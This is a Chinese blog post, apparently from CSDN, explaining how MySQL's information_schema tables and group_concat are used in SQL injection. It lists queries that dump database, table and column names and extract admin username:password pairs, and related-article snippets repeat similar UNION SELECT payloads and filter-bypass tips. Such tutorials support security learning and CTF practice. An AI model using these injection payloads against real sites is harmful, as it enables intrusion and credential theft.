mysql5注入中group_concat的使用

最新推荐文章于 2024-05-28 20:11:32 发布
最新推荐文章于 2024-05-28 20:11:32 发布
阅读量4.7k 收藏 14
点赞数 3
分类专栏: Linux 文章标签: mysql 数据库 schema 存储 sql注入
mysql中的information_schema 结构用来存储数据库系统信息 

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。  


| SCHEMATA ――>存储数据库名的, 

|——>关键字段:SCHEMA_NAME,表示数据库名称 


| TABLES ――>存储表名的 

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示表的名称 


| COLUMNS ――>存储字段名的 

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示所属的表的名称 

    COLUMN_NAME表示字段名 


可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。 

爆所有数据名 


select group_concat(SCHEMA_NAME) from information_schema.schemata 


得到当前库的所有表 

select group_concat(table_name) from information_schema.tables where table_schema=database() 


得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572 

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572 



得到字段具体的值 

select group_concat(username,0x3a,password) from adminuser
warmjuhao
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
concat mysql sql注入_MySQL注入总结
weixin_32572129的博客
01-12 674
01 MySQL数据库结构及常用函数一、MySQL数据库结构MySQL数据库采用库=>表=>列=>数据的存储结构,这样的存储结构影响着我们后续的注入过程。1. MySQL内置库在MySQL(版本>=5.7)除了用户自建的如admin等数据库,还有一些MySQL自带的数据库,这些数据库存储着MySQL的关键信息:库名功能mysql保存有账户信息、权限信息、存储过程等sys...
mysql 5注入group_concat使用
weixin_34293902的博客
03-02 431
mysql的information_schema 结构用来存储数据库系统信息 information_schema 结构这几个表存储的信息,在注射可以用到的几个表。  | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――>存储表名的 ...
sql注入利用group_concat函数
最新发布
m0_70638961的博客
05-28 332
这里我使用的是sqllab-less1,通过对数据库的查询,我们发现数据库表名,列名,等数据在information_schema数据库。但是这样只能回显某一个表,这时就可以使用group_concat函数把security的每一个表回显出来。首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔符分隔。这里我们选择users表回显出用户名username和密码password。当库名、表名、列名都查到了之后,选择最有用的回显出来就成功的注入了。当然这是最简单的注入
mysql 暴库 group_concat(),mysql 5注入group_concat使用
weixin_32645721的博客
03-17 154
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
[20][03][39] MySQL 注入的 concat/concat_ws/group_concat 函数详解
安全新司机
08-26 329
[TOC] 本文使用的例子均在下面的数据库表 t_subject 下执行 1. concat() 函数 1.1 功能 将多个字符串连接成一个字符串 1.2 语法 concat(str1, str2, ...) 返回结果为连接参数产生的字符串,如果有任何一个参数为 null,则返回值为 null 1.3 举例 例 1 select concat (id, name, score) as info from t_subject; 间有一行为 null 是因为 t_subject 表有一行的 s
SQL注入group_concat的学习笔记
kofi的博客,已停更
04-07 1377
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
MySQL concat里面使用多个单引号,三引号的问题
09-08
MySQL,`CONCAT`函数用于将两个或更多的字符串连接成一个字符串。当你在`CONCAT`处理包含单引号或者三引号的字符串时,需要特别注意如何正确地表示它们,以避免语法错误。 1. **单引号的使用**: 在SQL,...
10-sql注入-mysql注入1
08-03
- **路径符号**:在URL或表单提交使用双斜杠(\\)或正斜杠(/)来构造SQL语句。 - **十六进制编码**:将特殊字符转换为十六进制,避免引号的使用,以绕过简单的过滤机制。 - **报错显示**:利用MySQL的错误...
mysql数据库命令练习与注入
01-21
与Less-1不同的是,Less-2可能需要更直接地使用`UNION SELECT`来获取`username`和`password`字段,因为这里的漏洞环境可能不支持复杂的`GROUP_CONCAT`操作。 总的来说,MySQL的远程访问配置涉及到网络和数据库权限...
MySql手工注入.doc#资源达人分享计划#
08-12
5. **爆表**:利用`INFORMATION_SCHEMA.TABLES`表,攻击者可以获取特定数据库的所有表名,如:`AND 1=2 UNION SELECT 1, GROUP_CONCAT(table_name), 3 FROM information_schema.tables WHERE table_schema=...
MySQL注入绕开过滤的技巧总结
12-16
在字段名或值使用`HEX()`函数可以绕过过滤。例如,当`'`被过滤时,可以先将包含单引号的字符串转化为HEX编码,再进行注入。如`SELECT * FROM HEX('字段名') WHERE id = 1`。这样可以避免因单引号引发的语法错误,...
mysqlGROUP_CONCAT使用方法实例分析
12-14
本文实例讲述了mysqlGROUP_CONCAT使用方法。分享给大家供大家参考,具体如下: 现在有三个表,结构如下: cate表: CREATE TABLE `cate` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'id', `name` char(20) DEFAULT '' COMMENT '分类名', PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='\u6587\u7ae0\u5206\u7c7b\u8868'; article表: CRE
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3220
前言 在刚学习SQL注入的过程非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
SQL注入MYSQL注入
av11566的博客
04-19 7100
前言 MYSQL注入首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库符号"
sql注入知识点总结
JunDao73的博客
02-16 3115
个人的学习记录,主要推荐学习环境,和总体的针对sql注入漏洞想要得到数据库内容的思路还有注入利用到的函数介绍。
GROUP_CONCAT
inexaustible的博客
05-23 119
GROUP_CONCAT
ctfhub技能树-WEB(SQL注入和文件上传)
Cobra的博客
09-21 1119
ctfhub技能树---WEB篇 SQL注入 整数型注入 1、判断注入类型 1 and 1=1 正常输出 1 and 1=2 不输出 (数字型注入) 2、猜解字段数 1 order by 2 页面回显正常 1 order by 3 页面无回显 字段数为2 3、查看显示位 -1 union select 1,2 显示位是Data 4、查看数据库名 -1 union select 1...
mysql注入语句 爆表_mysql注入语句
weixin_42361635的博客
02-04 833
一、sql注入语句爆破所有数据库:(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:(select ...
mysql-injection整理
criminal_1的博客
02-20 180
sql注入整理
mysql多行转多列情况
06-09
MySQL ,可以使用 GROUP_CONCAT 函数和动态 SQL 将多行数据转换为多列数据。以下是一个示例: 假设我们有一个名为 Sales 的表,其包含如下数据: ``` Product Month SalesAmount Product A Jan 100 Product A Feb 150 Product A Mar 200 Product B Jan 50 Product B Feb 75 Product B Mar 100 ``` 现在我们想将每个产品的每个月份的销售额转换为一列。由于列数不固定,我们需要使用 GROUP_CONCAT 函数和动态 SQL 来构建查询语句。以下是一个示例: ``` SET @sql = NULL; SELECT GROUP_CONCAT(DISTINCT CONCAT( 'MAX(CASE WHEN Month = ''', Month, ''' THEN SalesAmount ELSE NULL END) AS `', Month, '`' ) ) INTO @sql FROM Sales; SET @sql = CONCAT('SELECT Product, ', @sql, ' FROM Sales GROUP BY Product'); PREPARE stmt FROM @sql; EXECUTE stmt; DEALLOCATE PREPARE stmt; ``` 在这个查询,我们首先使用 GROUP_CONCAT 函数和 CONCAT 函数将每个月份转换为一个 MAX(CASE...) 语句,每个 MAX(CASE...) 语句对应一个月份的销售额。接下来,我们将这些 MAX(CASE...) 语句合并为一个 SELECT 语句,并使用 PREPARE 函数和 EXECUTE 函数执行查询。 注意,在使用动态 SQL 时需要注意 SQL 注入攻击的风险。为了避免 SQL 注入攻击,应该对输入参数进行严格的校验和过滤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值